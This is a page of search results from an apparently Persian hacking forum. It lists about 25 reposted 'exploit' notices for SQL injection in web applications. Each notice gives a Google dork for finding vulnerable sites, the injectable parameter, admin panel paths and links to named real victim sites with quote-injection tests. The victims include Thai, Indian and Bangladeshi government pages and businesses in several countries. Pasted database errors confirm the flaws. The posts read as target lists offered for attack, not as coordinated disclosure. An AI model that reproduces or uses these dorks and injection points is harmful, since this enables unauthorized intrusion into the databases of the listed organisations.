امکانات انجمن
  • مهمانان محترم می توانند بدون عضویت در سایت در بخش پرسش و پاسخ به بحث و گفتگو پرداخته و در صورت وجود مشکل یا سوال در انجمنن مربوطه موضوع خود را مطرح کنند

moharram

iran rules jazbe modir
snapphost mahak

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'injection'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • انجمن های اصلی تیم
    • قوانین و اساسنامه ی انجمن
    • آخرین خبرها
    • اطلاعیه ها
    • مدیران
    • دوره های آموزشی
    • انتقادات پیشنهادات
  • آموزش های تخصصی
    • برنامه نویسی
    • هکینگ
    • امنیت
    • شبکه
    • سخت افزار
    • متفرقه
  • پرسش و پاسخ (FAQ)
    • سوالات و مشکلات پیرامون برنامه نویسی
    • سوالات و مشکلات پیرامون هکینگ
    • سوالات و مشکلات پیرامون امنیت
    • سوالات و مشکلات پیرامون شبکه
    • سوالات و مشکلات پیرامون سخت افزار
    • سوالات و مشکلات پیرامون سیستم عامل
    • سوالات و درخواست های متفرقه
  • سیستم عامل
    • ویندوز
    • لینوکس
    • کالی لینوکس
    • اندروید
    • اپل
  • بخش ویژه (مخصوص اعضای ویژه)
    • هکینگ
    • امنیت
    • شبکه
    • متفرقه
  • پروژه های تیم
    • پروژه های نفوذ به سایت
    • پروژه های ساخت نرم افزار
    • پروژه های آسیب پذیری
    • پروژه های ساخت سایت
  • مسابقات
    • مسابقات امنیت و هکینگ
    • مسابقات برنامه نویسی
    • مسابقات کرکینگ
  • عمومی
    • توسعه دهندگان
    • ترفند های متفرقه
    • گرافیک
    • ربات تلگرام
  • بحث آزاد علمی
    • عمران و معماری
    • الکتروتکنیک
    • کتابخانه سراسری
  • بخش دریافت
    • دانلود نرم افزار
  • آرشیو
    • بایگانی

دسته ها

  • Articles

191 نتیجه پیدا شد

  1. Pro-Exploit

    # Exploit Title: EZ Launch - SQL Injection # Google Dork: Powered By EZ SiteLaunch LTD ext:asp # Date: 17/09/2018 # Author: Rednofozi # Team: https://anonysec.org # Tested on: Windows 10 x64 # Vendor Homepage: http://www.ezsitelaunch.com/ # Software Link: http://www.realestatewebtemplates.com/ *************************************************** [+] Vulnerable File: main.asp [+] Parameter: ID ====== [+] Test: ====== [+] localhost/main.asp?id=1' ======== [+] Returns: ======== [+] Microsoft Access Database Engine error '80040e14' [+] Syntax error (missing operator) in query expression 'mainID = 1'''. [+] /main.asp, line 27 *************************************************** iran anonysec hackers *************************************************** Discovered by : Rednofozi Thanks To: ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow http://www.exploit4arab.org/exploits/2037
  2. Pro-Exploit

    [+] Title :- Powered by CIA UsA SQL Injection [+] Date :- 2018-09-13 [+] Exploit Author :- Rednofozi [+] Version :- All Versions [+] Tested on :- Linux - Windows [+] Category :- webapps [+] Google Dorks :- 1- 'intext:'' Powered by:CIA' inurl:.php id=' [+] Team name :- Anonysec.org [+] Vendor Homepage :- http://www.bapujidental.edu [+] Official Website :- anonysec [+] Contact :- Rednofozi@yahoo.com ========================================================= demo Injection Injection sql http://www.bapujidental.edu/gallery.php?id=7%27 Injection http://www.bpc.gov.bd/contactus.php?id=13%27 Injection Enjoy ! -------------------------------------------------------------------------------------------- ####################################################### Anonysec hacker iranin ######################################################## ======================================================= # Discovered by : Rednofozi #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow http://www.exploit4arab.org/exploits/2034
  3. [+] Title :- Powered by Special Branch Bangladesh Police SQL Injection [+] Date :- 2018-09-13 [+] Exploit Author :- Rednofozi [+] Version :- All Versions [+] Tested on :- Linux - Windows [+] Category :- webapps [+] Google Dorks :- 1- 'intext:'' Powered by: Special Branch, Bangladesh Police inurl:.php id=' [+] Team name :- Anonysec.org [+] Vendor Homepage :- http://www.immi.gov.bd/ [+] Official Website :- anonysec [+] Contact :- Rednofozi@yahoo.com ========================================================= demo Injection Injection sql http://www.immi.gov.bd/news.php?RecordNo=7%27 Injection http://www.bpc.gov.bd/contactus.php?id=13%27 Injection Enjoy ! -------------------------------------------------------------------------------------------- ####################################################### Anonysec hacker iranin ######################################################## ======================================================= # Discovered by : Rednofozi #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow http://www.exploit4arab.org/exploits/2035
  4. Pro-Exploit

    http://www.exploit4arab.org/exploits/2032 [+] Title :- Powered by:Nasa . SQL Injection [+] Date :- 2018-09-13 [+] Exploit Author :- Rednofozi [+] Version :- All Versions [+] Tested on :- Linux - Windows [+] Category :- webapps [+] Google Dorks :- 1- 'intext:'' Powered by:nasa' inurl:.php id=1' [+] Team name :- Anonysec.org [+] Vendor Homepage :- http://www.platinumplace.co.th [+] Official Website :- anonysec [+] Contact :- Rednofozi@yahoo.com ========================================================= # SQL Database Error => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1013''' at line 1 ============================================================================ Tested on (: Injection test http://www.safersex.co.za/index.php?id=22%27 Injection http://www.dynatekbikes.com/news.php?id=10%27 Injection http://www.platinumplace.co.th/project/gallery.php?id=1%27 Injection Enjoy ! -------------------------------------------------------------------------------------------- ####################################################### Anonysec hacker iranin ######################################################## ======================================================= # Discovered by : Rednofozi #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow
  5. Pro-Exploit

    +] Title :- Designed By Sex . SQL Injection [+] Date :- 2018-09-12 [+] Exploit Author :- Rednofozi [+] Version :- All Versions [+] Tested on :- Linux - Windows [+] Category :- webapps [+] Google Dorks :- 1- 'intext:'' Designed by sex'' inurl:.php id=1' [+] Team name :- Anonysec.org [+] Vendor Homepage :- http://www.safersex.co.za [+] Official Website :- anonysec [+] Contact :- Rednofozi@yahoo.com ========================================================= ============================================================================ Tested on (: http://www.safersex.co.za/index.php?id=22%27 Injection https://lgbttobacco.org/resources.php?ID=22%27 Injection http://www.valepackaging.ca/zoom-admin/index.php Injection Enjoy ! -------------------------------------------------------------------------------------------- ####################################################### Anonysec hacker iranin ######################################################## ======================================================= # Discovered by : Rednofozi #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow http://www.exploit4arab.org/exploits/2031
  6. [+] Title :- Designed and Developed By Cloud Innovators Solution SQL Injection Vulnerability [+] Date :- 2018-09-10 [+] Exploit Author :- Rednofozi [+] Vendor Homepage :-http://www.atrium.com.pk [+] Version :- All Versions [+] Tested on :- Linux - Windows [+] Category :- webapps [+] Google Dorks :- 'intext:'' Designed and Developed By Cloud Innovators Solution'' inurl:.php id=1' [+] Team name :- Anonysec.org [+] Official Website :- nadaram :d [+] Contact :- Rednofozi@yahoo.com ========================================================= ######################################################## demos http://www.atrium.com.pk/Gallery.php?ID=4%27 (___SQL Injection___) https://www.sellup.pk/Page.php?ID=1 (___SQL Injection___) http://www.atrium.com.pk/Shopping.php?ID=1%27 (___SQL Injection___) ####################################################### Anonysec hacker iranin ######################################################## ======================================================= # Discovered by : Rednofozi #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow http://www.exploit4arab.org/exploits/2023
  7. [+] Title :- Designed by online store SQL Injection Vulnerability [+] Date :- 2018-09-09 [+] Vendor Homepage :- http://www.jdcaravan.com [+] Version :- All Versions [+] Tested on :- Linux - Windows [+] Category :- webapps [+] Google Dorks :- 'php id= online store' [+] Exploit Author :- Rednofozi [+] Team name :- Anonysec.org [+] Official Website :- nadaram :d [+] Contact :- Rednofozi@yahoo.com ========================================================= ######################################################## demos http://www.jdcaravan.com/store.php?id=1%27 (___SQL Injection___) https://www.bradfordshoes.com/product.php?cat_id=5%27 (___SQL Injection___) http://www.samarpanbharat.org/read_full_news.php?id=1%27 (___SQL Injection___) ####################################################### Anonysec hacker iranin ######################################################## ======================================================= # Discovered by : Rednofozi #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow Like us on Facebook : http://www.exploit4arab.org/exploits/2022
  8. [+] Title :- Website Developed by tanzania SQL Injection Vulnerability [+] Date :- 2018-09-07 [+] Vendor Homepage :- http://www.suhailtours.com [+] Version :- All Versions [+] Tested on :- Linux - Windows [+] Category :- webapps [+] Google Dorks :- 'php id=1 tanzania' [+] Exploit Author :- Rednofozi [+] Team name :- Anonysec.org [+] Official Website :- nadaram :d [+] Contact :- Rednofozi@yahoo.com ========================================================= [+] Request Method(s) :- GET / POST [+] Vulnerable Parameter(s) :- id [+] Affected Area(s) :- Entire admin, database, Server [+] About :- Unauthenticated SQL Injection via Multiple Php Files causing an SQL error ######################################################## demos http://www.imd.gov.in/pages/obs_network.php?id=16%27 (___SQL Injection___) http://www.suhailtours.com/restaurants_list.php?id=2%27 (___SQL Injection___) http://www.samarpanbharat.org/read_full_news.php?id=1%27 (___SQL Injection___) ####################################################### Anonysec hacker iranin ######################################################## ======================================================= # Discovered by : Rednofozi #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow http://www.exploit4arab.org/exploits/2021
  9. |*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*| |[+] Exploit Title: webmaster: jirka@gaysport.cz SQL Injection |*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*| |[+] Exploit Author: Bl4ck M4n |[+] und3rgr0und Telegram @Bl4ckHack |[+] Tested on: Windows 8 , parrot os |[+] saeid.saeid081@gmail.com |[+] joker_s_hack_s@yahoo.com ----------------------------------------------------------------------------- |[+] search google Dork : "webmaster: jirka@gaysport.cz" ----------------------------------------------------------------------------- |[+] Vendor site: http://www.gaysport.cz/ |[+] Demo: Sql |[+] http://www.gaysport.cz/index.php?id=2 |*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|
  10. ################################################################################################# # Exploit Title : Powered By invitroestudio Argentina SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 08/09/2018 # Vendor Homepage : invitroestudio.com.ar # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ################################################################################################# # Google Dork : intext:''Powered By invitroestudio'' site:ar # Exploit : /productos-grid.php?idsubcat=[SQL Injection] /productos-grid.php?idsubcat=[ID-NUMBER]&marca=Taloffice&orden=[ID-NUMBER]&desde=[SQL Injection] ################################################################################################# # Example Site => clipers.com.ar/productos-grid.php?idsubcat=14%27 => [ Proof of Concept ] => archive.is/D2ATZ clipers.com.ar/productos-grid.php?idsubcat=14&marca=Taloffice&orden=3&desde=0%27 # SQL Database Error => Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in /home2/cliper/public_html/productos-grid.php on line 891
  11. ################################################################################################# # Exploit Title : Diseño y Desarrollo LastClick Argentina SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 08/09/2018 # Vendor Homepage : lastclick.com.ar # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ################################################################################################# # Google Dork : intext:''Desarrollo: www.lastclick.com.ar | Corrientes - Argentina'' Admin Control Panel Path => /admin/index.php # Exploit : /seccion.php?pagina=[SQL Injection] /seccion.php?pagina=[ID-NUMBER]&id=[SQL Injection] /ver_nota.php?id=[SQL Injection] ################################################################################################# # Example Site => saladasinforma.com.ar/seccion.php?pagina=437&id=3%27 => [ Proof of Concept ] => archive.is/7q7Xe # SQL Database Error => Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in /home/saladasi/public_html/objetos/DBConnection.php on line 209
  12. ################################################################################################# # Exploit Title : Powered By PAS World Communitcation Ltd and Nakhonkorat ThailandGov SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 10/09/2018 # Vendor Homepage : nakhonkorat.com # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ################################################################################################# # Google Dork : intext:''Powered By :: PAS World Communitcation,.ltd. AND nakhonkorat.com'' # Admin Control Panel Path => /admin/index.php # Exploit : /news.php?cat_id=[SQL Injection] /detail.php?id=[SQL Injection] ################################################################################################# # Example Site => talasupcity.go.th/news.php?cat_id=1%27 => [ Proof of Concept ] => archive.is/3iibd lamkaen.go.th/news.php?cat_id=14%27 suankluay.go.th/detail.php?id=251%27 klongkiew.go.th/detail.php?id=1%27 thungwa.go.th/detail.php?id=1%27 bangpradaeng.go.th/detail.php?id=1%27 sunthornphu.go.th/detail.php?id=1%27 senauthai.go.th/detail.php?id=1%27 chedihak.go.th/detail.php?id=1%27 # SQL Database Error => You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '' ORDER BY d_date DESC, created' at line 1
  13. ################################################################################################# # Exploit Title : BizPotential EasyWebTime 8.6.2 Thailand Government SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 10/09/2018 # Vendor Homepage : bizpotential.com ~ ewtadmin.com # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ################################################################################################# # Google Dorks : inurl:''/ewtadmin/'' site:go.th inurl:''/main.php?filename='' site:go.th inurl:''/ewtadmin/ewt/ccs/'' intext:''© Copyright 2007 - BizPotential.com - All Rights Reserved.'' intext:''Copyright 2007 - BizPotential Co., Ltd. - All Rights Reserved'' ################################################################################################# # Admin Control Panel Paths => /ewtadmin/index.php /ewtadmin82/ /ewtcommittee/index2331.php /ewtadmin/ewt/DOMAINNAMEHERE_intranet/ewt_login.php # SQL Injection Exploit : /n_more3.php?page=[ID-NUMBER]&c_id=[SQL Injection] /ewtadmin/ewt/[DOMAINNAME_web/n_more.php?c_id=[SQL Injection] /more_news.php?offset=[SQL Injection] /more_news.php?offset=-[ID-NUMBER]&cid=&startoffset=[SQL Injection] ################################################################################################# # Webboard Exploit : /ewtadmin/ewt/ccs/addquestion.php?wcad=5&t=1&filename=webboard # Webboar Directory Path : /ewtadmin/ewt/ccs/index_question.php?wcad=5&t=1&filename=webboard ccs.DOMAINNAME.go.th/index_question.php?wcad=5&t=1&filename=webboard ################################################################################################# # Example Site => Thailand Government Chachoengsao Cooperative Auditing Office cad.go.th/ewtadmin/ewt/ccs/addquestion.php?wcad=5&t=1\%27&filename=webboard cad.go.th/ewtadmin/ewt/ccs/index_question.php?wcad=5&t=1&filename=webboard ccs.cad.go.th/index_question.php?wcad=5&t=1&filename=webboard ################################################################################################# Thailand Government Department of Mineral Sources # Example Sites => dmr.go.th/n_more3.php?page=0&c_id=199%27 => [ Proof of Concept ] => dmr.go.th/ewtadmin/ewt/dmr_web/n_more.php?c_id=556%27 => [ Proof of Concept ] => archive.is/bUcka # SQL Database Error => SELECT * FROM article_list WHERE c_id = '199'' and n_approve = 'Y' ORDER BY n_date DESC LIMIT -20,20 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20,20' at line 1 Thailand Government Office of Consumer Protection Board # ocpb.go.th/more_news.php?offset=-30&cid=&startoffset=-10%27 => [ Proof of Concept ] => archive.is/inA3o # SQL Database Error => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-30, 10' at line 3 Thailand Government Ministry of Culture and Cooperatives - Auditing Department # cad.go.th/cadweb_eng/ewt_w3c/more_news.php?offset=60%27 => [ Proof of Concept ] => archive.is/a4XYx # SQL Database Error => Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in D:\WWW\ewtadmin\ewt\cadweb_eng\lib\function.php on line 101 SELECT * FROM article_list WHERE ( c_id = '' ) AND n_approve = 'Y' AND (('2561-09-10 05:57:13' between n_date_start and n_date_end) or (n_date_start = '' and n_date_end = '')) ORDER BY n_date DESC,n_timestamp DESC LIMIT 60\\\',20 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\',20' at line 1
  14. ==================================================================================================================================== | # Title : brsis sql injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) | | # Vendor : http://www.brsis.com.br/ | | # Dork : "Produzido por Brsis" | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine . [+] http://www.jj.ind.br/produtos.php?idlinha=2 <=== inject here [+] http://www.jj.ind.br/extranet/index.php <==== Panel
  15. ################################################################################################# # Exploit Title : Diseño y Desarrollo D&H Soluciones Argentina SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 08/09/2018 # Vendor Homepage : dyhsoluciones.com.ar # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ################################################################################################# # Google Dork : intext:''Diseño y Desarrollo: D&H Soluciones'' # Exploit : /productos-listado.php?_pagi_pg=[SQL Injection] /producto.php?id=[SQL Injection] ################################################################################################# # Example Site => mapaequipamientos.com.ar/productos-listado.php?_pagi_pg=357' => [ Proof of Concept ] => archive.is/ycpMz # SQL Database Error => Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/mapa/public_html/inc/productos-listado.php on line 63 Error en la consulta de conteo de registros: SELECT COUNT(*) FROM contenido_web inner join contenido_web_x_categorias on contenido_web.id = contenido_web_x_categorias.idContenido where contenido_web_x_categorias.idCategorias = 38 order by contenido_web.fecha desc. Mysql dijo: Table 'mapa_dyhcms.contenido_web' doesn't exist
  16. ################################################################################################# # Exploit Title : Sitio oficial de Jeep® Argentina Powered By Turnos SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 08/09/2018 # Vendor Homepage : jeep.com.ar # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ################################################################################################# # Google Dork : intext:''©2017 FCA US LLC. Todos los derechos reservados.Chrysler, Dodge, Jeep, Ram, Mopar y SRT son marcas registradas de FCA US LLC.'' Admin Control Panel Path => /admin/ # Exploit : /index.php?action=turnos&id_actividad=[SQL Injection] /index.php?action=turnos&id_actividad=[ID-NUMBER]&id_vehiculo=&year=[ID-NUMBER]&month=[ID-NUMBER]&day=[ID-NUMBER]&desde=[ID-NUMBER]&hasta=[SQL Injection] ################################################################################################# # Example Site => offroadparkverano.com.ar/index.php?action=turnos&id_actividad=3%27 => [ Proof of Concept ] => archive.is/c9aOS offroadparkverano.com.ar/index.php?action=turnos&id_actividad=3&id_vehiculo=&year=2019&month=02&day=20&desde=1800&hasta=2130%27 => [ Proof of Concept ] => archive.is/rAbHR # SQL Database Error => Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/adminh4/public_html/turnos.php on line 20 mysql_error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
  17. [+] Title :- JET Database Germany SQL Injection Vulnerability [+] Date :- 2018-09-07 [+] Vendor Homepage :- www.spruehwerk.de [+] Version :- All Versions [+] Tested on :- Linux - Windows [+] Category :- webapps [+] Google Dorks :- intext:"JET Database" +site:de [+] Exploit Author :- Rednofozi [+] Team name :- Anonysec.org [+] Official Website :- nadaram :d [+] Contact :- Rednofozi@yahoo.com ========================================================= ######################################################## demos http://www.spruehwerk.de/new/galerie/Innen/0xp3xr07vv220.htm ####################################################### Anonysec hacker iranin ######################################################## ======================================================= # Discovered by : Rednofozi #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow http://www.exploit4arab.org/exploits/2018
  18. [+] Title :- Designed & Developed by france SQL Injection Vulnerability [+] Date :- 2018-09-06 [+] Vendor Homepage :- http://www.romanianwriters.ro/ [+] Version :- All Versions [+] Tested on :- Linux - Windows [+] Category :- webapps [+] Google Dorks :- site .fr inurl .php id=1 [+] Exploit Author :- Rednofozi [+] Team name :- Anonysec.org [+] Official Website :- nadaram :d [+] Contact :- Rednofozi@yahoo.com ========================================================= [+] Request Method(s) :- GET / POST [+] Vulnerable Parameter(s) :- id [+] Affected Area(s) :- Entire admin, database, Server [+] About :- Unauthenticated SQL Injection via Multiple Php Files causing an SQL error ######################################################## demoshttp://www.romanianwriters.ro/s.php?id=1%27 (___SQL Injection___) http://www.com2go.com/index.php?id=26%27 (___SQL Injection___) https://www.dt-shop.com/index.php?id=3&L=1' (___SQL Injection___) ####################################################### Anonysec hacker iranin ######################################################## ======================================================= # Discovered by : Rednofozi #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow http://www.exploit4arab.org/exploits/2017
  19. [+] Title :- Designed & Developed by qatar SQL Injection Vulnerability [+] Date :- 2018-09-06 [+] Vendor Homepage :- http://www.merjs-qatar.com [+] Version :- All Versions [+] Tested on :- Linux - Windows [+] Category :- webapps [+] Google Dorks :- 'php id=1 qatar' [+] Exploit Author :- Rednofozi [+] Team name :- Anonysec.org [+] Official Website :- nadaram :d [+] Contact :- Rednofozi@yahoo.com ========================================================= [+] Request Method(s) :- GET / POST [+] Vulnerable Parameter(s) :- id [+] Affected Area(s) :- Entire admin, database, Server [+] About :- Unauthenticated SQL Injection via Multiple Php Files causing an SQL error ######################################################## demos http://www.supremetech.me/services.php?id=24%27 (___SQL Injection___) http://hdecoqatar.com/gallery.php?id=1%27 (___SQL Injection___) http://www.merjs-qatar.com/projects.php?id=1%27 (___SQL Injection___) ####################################################### Anonysec hacker iranin ######################################################## ======================================================= # Discovered by : Rednofozi #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow http://www.exploit4arab.org/exploits/2016
  20. ###################################################### # Title : Web Design .sa.php saudi arabia www.azdan.com.sa Sql injection Vulnerability # Author : AnonySec # category : webapps # Tested On : Win 10 , Kali Linux # my team: www.anonysec.org # Vendor HomePage : www.azdan.com.sa # Google Dork: '.sa.php id=' ###################################################### # Search google Dork : '.sa.php id=' # inject sql codes ...... #Demo : http://www.ftc.com.sa/group-info.php?id=13%27' (Sql Injection) http://www.pumps-hv.com/news.php?id=218%27' (Sql Injection) # Discovered by : Moeein Seven | www.moeein.ir #--tnx to : ReZa CLONER , Rednofozi , SheikhShahin , MiladShadow and all bax from anonysec team..... http://www.exploit4arab.org/exploits/2015
  21. ###################################################### # Title : Web Design saudi hotels Sql injection Vulnerability # Author : AnonySec # category : webapps # Tested On : Win 10 , Kali Linux # my team: www.anonysec.org # Vendor HomePage : www.retajalrayyan.com # Google Dork: 'php id= saudi hotels' ###################################################### # Search google Dork : 'php id= saudi hotels' # inject sql codes ...... #Demo : http://www.retajroyaledoha.com/offer.php?id=13%27' (Sql Injection) http://www.retajalrayyan.com/offer.php?id=22%27' (Sql Injection) # Discovered by : Moeein Seven | www.moeein.ir #--tnx to : ReZa CLONER , Rednofozi , SheikhShahin , MiladShadow and all bax from anonysec team..... http://www.exploit4arab.org/exploits/2014
  22. ################################################################################################# # Exploit Title : Hoteliraqua Todos los Derechos Reservados © 2013 SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 07/09/2018 # Vendor Homepage : hoteliraqua.com # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ################################################################################################# # Google Dork : intext:''www.hoteliraqua.com - Todos los Derechos Reservados © 2013'' # Exploit : /Reservas.php?id=[SQL Inj] ################################################################################################# # Example Site => hoteliraqua.com/Reservas.php?id=5%27 => [ Proof of Concept ] => archive.is/tOVc9 # SQL Database Error => Error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''5''' at line 1 SELECT `Content`,`Title`,`Menu` FROM site_web WHERE PageID = '5'' ################################################################################################# # Discovered By KingSkrupellos
  23. ################################################################################################# # Exploit Title : ReturnDates is under the care of (c) ThePopeRope SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 07/09/2018 # Vendor Homepage : returndates.com # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ################################################################################################# # Google Dork : intext:''Returndates.com is under the care of (c) Thepoperope.'' # Exploit : /news.php?id=[SQL Inj] ################################################################################################# # Example Site => returndates.com/news.php?id=6122%27 # SQL Database Error => Warning: mysql_numrows() expects parameter 1 to be resource, boolean given in /mounted-storage/home63c/sub005/sc41041-ECUF/returndates.com/news.php on line 216 ################################################################################################# # Discovered By KingSkrupellos
  24. ################################################################################################# # Exploit Title : India Ministry of Earth Sciences Meteorological Department SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 07/09/2018 # Vendor Homepage : imd.gov.in # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ################################################################################################# # Google Dork : intext:''Copyright © India Meteorological Department 2015 This Website belongs to India Meteorological Department, Ministry of Earth Sciences,Government of India'' # Exploit : /PATH/obs_network.php?id=[SQL Inj] ################################################################################################# # Example Site => imd.gov.in/pages/obs_network.php?id=16' => [ Proof of Concept ] => archive.is/zaH4f # SQL Database Error => You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '%') ORDER BY obs_name' at line 1 ################################################################################################# # Discovered By KingSkrupellos
  25. ################################################################################################# # Exploit Title : © Inter Alia 2013 InterAliaProject Web Design SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 07/09/2018 # Vendor Homepage : interaliaproject.com # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ################################################################################################# # Description : - InterAliaProject - To bring people closer to each other and to Europe through breaking stereotypes, analysing and deconstructing conflict, engaging actively in key political issues and dialogue. - To raise awareness of the EU & prospective EU citizens on available channels for acting, participating & shaping Europe - To utilize the increasing willingness of the European youth to share their skills, expertise and energy, and to improve youth employability - To apply pressure to EU mechanisms for the expansion of participation of EU & prospective EU citizens in the European process - To provide multi-disciplinary approaches and integrate fragmented knowledge into a fruitful scheme # Google Dork : intext:''© Inter Alia 2013'' # Exploit : /news.php?id=[SQL Injection] ################################################################################################# # Example Site => interaliaproject.com/news.php?id=115%27 => [ Proof of Concept ] => archive.is/1Rqb6 # SQL Database Error => Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/interali/public_html/news.php on line 71 ################################################################################################# # Discovered By KingSkrupellos